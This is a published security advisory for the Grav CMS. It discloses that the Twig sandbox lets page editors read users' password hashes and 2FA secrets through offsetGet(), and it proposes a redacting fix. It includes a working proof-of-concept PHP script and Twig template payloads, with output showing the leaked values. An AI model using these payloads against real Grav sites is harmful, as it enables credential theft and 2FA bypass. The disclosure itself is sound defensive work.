GHSA-3jhr-mxmx-38cx

Suggest an improvement
Source
https://github.com/advisories/GHSA-3jhr-mxmx-38cx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-3jhr-mxmx-38cx/GHSA-3jhr-mxmx-38cx.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3jhr-mxmx-38cx
Aliases
Published
2026-09-17T20:27:30Z
Modified
2026-09-17T20:45:05Z
Severity
  • 7.7 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVSS Calculator
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
Summary
Grav: UserInterface offsetget/offsetexists allow-listed in Twig sandbox let editor-authored content leak hashed_password and 2FA secrets via offsetGet()
Details

Summary

system/config/security.yaml's Twig sandbox policy allow-lists offsetget and offsetexists for Grav\Common\User\Interfaces\UserInterface. The concrete Grav\Common\User\DataUser\User class does not filter which fields offsetGet() returns, so any sandboxed template with access to a User object can read hashed_password, secret (2FA seed), and twofa_secret directly, bypassing the redaction Grav's own code applies everywhere else.

The core evidence, from Grav's own code

system/src/Grav/Common/User/DataUser/User.php:

/**
 * {@inheritdoc}
 * Override to filter out sensitive fields like password hashes
 */
public function jsonSerialize(): array
{
    $items = parent::jsonSerialize();

    // Security: Remove sensitive fields that should never be exposed to frontend
    unset($items['hashed_password']);
    unset($items['secret']);         // 2FA secret
    unset($items['twofa_secret']);   // Alternative 2FA field name

    return $items;
}

public function offsetGet($offset)
{
    $value = parent::offsetGet($offset);
    // only special-cases 'authorized', nothing else -- no redaction
    return $value;
}

system/config/security.yaml:

- class: 'Grav\Common\User\Interfaces\UserInterface'
  methods: 'authorize, authorized, authenticated, username, fullname, email, language, offsetget, offsetexists'

This is the same vulnerability shape as two already-fixed issues in this file (GHSA-j274-39qw-32c9 and GHSA-mc5q-6hpj-rp7j -- both a raw, unfiltered data-access path bypassing an intended redaction) recurring on a third class neither fix covered.

Live, end-to-end verification

Built a real Twig\Environment wired with the real Twig\Extension\SandboxExtension, policed by Grav's own GravSecurityPolicy class, constructed directly from values parsed out of the actual system/config/security.yaml (via Symfony\Component\Yaml\Yaml::parseFile, not a hand-copied excerpt), rendering real template strings against a real User object.

Environment setup:

git clone https://github.com/getgrav/grav.git
cd grav
apt-get install -y php8.3-curl php8.3-zip php8.3-xml php8.3-gd
curl -sL -o /tmp/composer.phar \
  "https://github.com/composer/composer/releases/latest/download/composer.phar"
COMPOSER_ALLOW_SUPERUSER=1 php /tmp/composer.phar install --no-dev --no-interaction

live_sandbox_render_test.php:

<?php
require 'vendor/autoload.php';

use Symfony\Component\Yaml\Yaml;
use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Grav\Common\Twig\Sandbox\GravSecurityPolicy;
use Grav\Common\User\DataUser\User;

$securityYaml = Yaml::parseFile('system/config/security.yaml');
$sandboxCfg = $securityYaml['twig_sandbox'];

function rowsToMap(array $rows): array {
    $out = [];
    foreach ($rows as $row) {
        $out[$row['class']] = array_map('strtolower', array_map('trim', explode(',', $row['methods'])));
    }
    return $out;
}

$policy = new GravSecurityPolicy(
    $sandboxCfg['allowed_tags'],
    $sandboxCfg['allowed_filters'],
    rowsToMap($sandboxCfg['allowed_methods']),
    rowsToMap($sandboxCfg['allowed_properties']),
    $sandboxCfg['allowed_functions']
);
$sandbox = new SandboxExtension($policy, true);

$user = new User([
    'username'        => 'admin',
    'hashed_password' => '$2y$10$REALBCRYPTHASHVALUEshouldnotleakXXXXXXXXXXXXXXXXXXXXX',
    'secret'          => 'JBSWY3DPEHPK3PXP',
    'twofa_secret'    => 'ALT2FASECRETVALUE9999',
]);

function tryRender(string $label, string $template, SandboxExtension $sandbox, User $user): void {
    $twig = new Environment(new ArrayLoader(['@Page:test' => $template]));
    $twig->addExtension($sandbox);
    try {
        echo "$label => " . $twig->render('@Page:test', ['user' => $user]) . "\n";
    } catch (\Twig\Sandbox\SecurityError $e) {
        echo "$label => BLOCKED: " . $e->getMessage() . "\n";
    }
}

tryRender('hashed_password via offsetGet()', "{{ user.offsetGet('hashed_password') }}", $sandbox, $user);
tryRender('secret via offsetGet()',          "{{ user.offsetGet('secret') }}", $sandbox, $user);
tryRender('twofa_secret via offsetGet()',    "{{ user.offsetGet('twofa_secret') }}", $sandbox, $user);
tryRender('twofa_secret via subscript',      "{{ user['twofa_secret'] }}", $sandbox, $user);
tryRender('control: user.set() (unlisted)',  "{{ user.set('email', 'pwned@evil.com') }}", $sandbox, $user);

Run: php live_sandbox_render_test.php

Output:

hashed_password via offsetGet() => $2y$10$REALBCRYPTHASHVALUEshouldnotleakXXXXXXXXXXXXXXXXXXXXX
secret via offsetGet() => JBSWY3DPEHPK3PXP
twofa_secret via offsetGet() => ALT2FASECRETVALUE9999
twofa_secret via subscript => BLOCKED: Calling "twofa_secret" property on a "Grav\Common\User\DataUser\User" object is not allowed in "@Page:test" at line 1.
control: user.set() (unlisted) => BLOCKED: Calling "set" method on a "Grav\Common\User\DataUser\User" object is not allowed in "@Page:test" at line 1.

The control payload (a real, non-allow-listed User method) is correctly blocked, and the target field was confirmed unchanged afterward -- confirming the sandbox is genuinely active and the three leaks above are real, not an artifact of a failed sandbox.

Precise nuance for the fix

Twig routes user.offsetGet('x') (explicit method call) and user['x'] (subscript sugar on a non-built-in ArrayAccess object) through two different sandbox checks -- checkMethodAllowed against allowed_methods, versus checkPropertyAllowed against allowed_properties. The subscript form is already correctly blocked, since UserInterface has no allowed_properties entry. Only the explicit .offsetGet()/ .offsetExists() method-call form leaks, because those methods are present in allowed_methods.

Scope, stated honestly

I could not find where Grav core itself binds a user variable into the sandboxed Twig page-content context -- Twig::processPage()'s $twig_vars has no 'user' key, and the Login plugin (the near-universal companion plugin that would populate "current logged-in user") is not part of this repository. I cannot independently confirm from this codebase alone whether that binding is always the current session user (self-disclosure only) or could resolve to an arbitrary other user (site-wide credential/2FA-secret disclosure). What is independently confirmed entirely from this repository: the security.yaml sandbox policy is Grav core's own security contract, and it allow-lists a method proven unsafe by Grav's own code, regardless of which plugin exercises it.

Impact

Any sandboxed Twig context where a UserInterface object is reachable (the standard, documented pattern for exposing "current user" to editor-authored content) allows extraction of that user's password hash (enabling offline cracking) and 2FA secret (enabling full authentication bypass by generating valid TOTP codes without possessing the user's device), by any user with page-edit permission.

Suggested fix

Trimming the UserInterface entry alone is insufficient: User extends Data, and the separate generic allowlist entry for Grav\Common\Data\Data (get, value, items, offsetget, offsetexists) independently grants the same access via instanceof matching, through three methods (get, value, offsetGet), not just one. I verified this by simulating the UserInterface-only fix and confirming all three still leak hashed_password and secret/twofa_secret.

The robust fix mirrors what was already done for Config in GHSA-j274-39qw-32c9: introduce a redacting facade for User (analogous to SandboxConfig) that filters hashed_password/secret/twofa_secret on every read path, and allow-list that facade in place of the raw User/Data class -- rather than trying to enumerate safe methods on a class whose parent class is independently allow-listed elsewhere in the same policy. A narrower alternative: override User::get()/value()/offsetGet() to apply the same redaction jsonSerialize() already does, so the fields simply don't exist to leak regardless of which accessor method reaches them.

Affected component

  • system/config/security.yaml, twig_sandbox.allowed_methods entry for Grav\Common\User\Interfaces\UserInterface
  • system/src/Grav/Common/User/DataUser/User.php, offsetGet() (behaves correctly given the sandbox's input; the gap is in what the sandbox allows through)

**Ecosystem:** `Composer`
**Package name:** `getgrav/grav`
**Affected versions:** current `2.0.15` dev tree (bounded by whenever `UserInterface` was first added to `allowed_methods` in `security.yaml` — worth checking `git log -p` on that file if you want an exact lower bound before submitting)
**Patched versions:** leave blank

**Severity / CVSS v3.1 vector string:**

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Resolves to **7.7 / High**. Attack Vector = Network, Attack Complexity = Low, Privileges Required = Low, User Interaction = None, Scope = Changed, Confidentiality = High, Integrity = None, Availability = None. Flag clearly in your submission (as the description does) that if the maintainers confirm the "arbitrary other user" reachability, this should be rescored toward Critical given the 2FA-bypass implication.

**CWE:** `CWE-522` (Insufficiently Protected Credentials), add `CWE-284` (Improper Access Control)
Database specific
{
    "cwe_ids": [
        "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-09-17T20:27:30Z",
    "nvd_published_at": null,
    "severity": "HIGH"
}
References

Affected packages

Packagist / getgrav/grav

Package

Name
getgrav/grav
Purl
pkg:composer/getgrav/grav

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
2.0.16

Affected versions

0.*
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.9.5
0.9.6
0.9.7
0.9.8
0.9.9
0.9.10
0.9.11
0.9.12
0.9.13
0.9.14
0.9.15
0.9.16
0.9.17
0.9.18
0.9.19
0.9.20
0.9.21
0.9.22
0.9.23
0.9.24
0.9.25
0.9.26
0.9.27
0.9.28
0.9.29
0.9.30
0.9.31
0.9.32
0.9.33
0.9.34
0.9.35
0.9.36
0.9.37
0.9.38
0.9.39
0.9.40
0.9.41
0.9.42
0.9.43
0.9.44
0.9.45
1.*
1.0.0-rc.1
1.0.0-rc.2
1.0.0-rc.3
1.0.0-rc.4
1.0.0-rc.5
1.0.0-rc.6
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.1.0-beta.1
1.1.0-beta.2
1.1.0-beta.3
1.1.0-beta.4
1.1.0-beta.5
1.1.0-rc.1
1.1.0-rc.2
1.1.0-rc.3
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.1.8
1.1.9-rc.1
1.1.9-rc.2
1.1.9-rc.3
1.1.9
1.1.10
1.1.11
1.1.12
1.1.13
1.1.14
1.1.15
1.1.16
1.1.17
1.2.0-rc.1
1.2.0-rc.2
1.2.0-rc.3
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.3.0-rc.1
1.3.0-rc.2
1.3.0-rc.3
1.3.0-rc.4
1.3.0-rc.5
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.4.0-beta.1
1.4.0-beta.2
1.4.0-beta.3
1.4.0-rc.1
1.4.0-rc.2
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8
1.5.0-beta.1
1.5.0-beta.2
1.5.0-rc.1
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.5.5
1.5.6
1.5.7
1.5.8
1.5.9
1.5.10
1.6.0-beta.1
1.6.0-beta.2
1.6.0-beta.3
1.6.0-beta.4
1.6.0-beta.5
1.6.0-beta.6
1.6.0-beta.7
1.6.0-beta.8
1.6.0-rc.1
1.6.0-rc.2
1.6.0-rc.3
1.6.0-rc.4
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.6.5
1.6.6
1.6.7
1.6.8
1.6.9
1.6.10
1.6.11
1.6.12
1.6.13
1.6.14
1.6.15
1.6.16
1.6.17
1.6.18
1.6.19
1.6.20
1.6.21
1.6.22
1.6.23
1.6.24
1.6.25
1.6.26
1.6.27
1.6.28
1.6.29
1.6.30
1.6.31
1.7.0-beta.1
1.7.0-beta.2
1.7.0-beta.3
1.7.0-beta.4
1.7.0-beta.5
1.7.0-beta.6
1.7.0-beta.7
1.7.0-beta.8
1.7.0-beta.9
1.7.0-beta.10
1.7.0-rc.1
1.7.0-rc.2
1.7.0-rc.3
1.7.0-rc.4
1.7.0-rc.5
1.7.0-rc.6
1.7.0-rc.7
1.7.0-rc.8
1.7.0-rc.9
1.7.0-rc.10
1.7.0-rc.11
1.7.0-rc.12
1.7.0-rc.13
1.7.0-rc.14
1.7.0-rc.15
1.7.0-rc.16
1.7.0-rc.17
1.7.0-rc.18
1.7.0-rc.19
1.7.0-rc.20
1.7.0
1.7.1
1.7.3
1.7.4
1.7.5
1.7.6
1.7.7
1.7.8
1.7.9
1.7.10
1.7.12
1.7.13
1.7.14
1.7.15
1.7.16
1.7.17
1.7.18
1.7.19
1.7.20
1.7.21
1.7.22
1.7.23
1.7.24
1.7.25
1.7.26
1.7.26.1
1.7.27
1.7.27.1
1.7.28
1.7.29
1.7.29.1
1.7.30
1.7.31
1.7.32
1.7.33
1.7.34
1.7.35
1.7.36
1.7.37
1.7.37.1
1.7.38
1.7.39
1.7.39.1
1.7.39.2
1.7.39.3
1.7.39.4
1.7.40
1.7.41
1.7.41.1
1.7.41.2
1.7.42
1.7.42.1
1.7.42.2
1.7.42.3
1.7.43
1.7.44
1.7.45
1.7.46
1.7.47
1.7.48
1.7.49
1.7.49.1
1.7.49.2
1.7.49.3
1.7.49.4
1.7.49.5
1.7.51
1.7.52
1.7.53
1.7.53.1
1.7.53.2
1.7.53.3
1.8.0-beta.1
1.8.0-beta.2
1.8.0-beta.3
1.8.0-beta.4
1.8.0-beta.5
1.8.0-beta.6
1.8.0-beta.7
1.8.0-beta.8
1.8.0-beta.9
1.8.0-beta.10
1.8.0-beta.11
1.8.0-beta.12
1.8.0-beta.13
1.8.0-beta.14
1.8.0-beta.15
1.8.0-beta.16
1.8.0-beta.17
1.8.0-beta.18
1.8.0-beta.19
1.8.0-beta.20
1.8.0-beta.21
1.8.0-beta.22
1.8.0-beta.23
1.8.0-beta.24
1.8.0-beta.25
1.8.0-beta.26
1.8.0-beta.27
1.8.0-beta.28
1.8.0-beta.29
2.*
2.0.0-beta.1
2.0.0-beta.2
2.0.0-beta.3
2.0.0-beta.4
2.0.0-rc.1
2.0.0-rc.2
2.0.0-rc.3
2.0.0-rc.4
2.0.0-rc.5
2.0.0-rc.6
2.0.0-rc.7
2.0.0-rc.8
2.0.0-rc.9
2.0.0-rc.10
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.0.8
2.0.9
2.0.10
2.0.11
2.0.12
2.0.13
2.0.14
2.0.15

Database specific

last_known_affected_version_range
"<= 2.0.15"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-3jhr-mxmx-38cx/GHSA-3jhr-mxmx-38cx.json"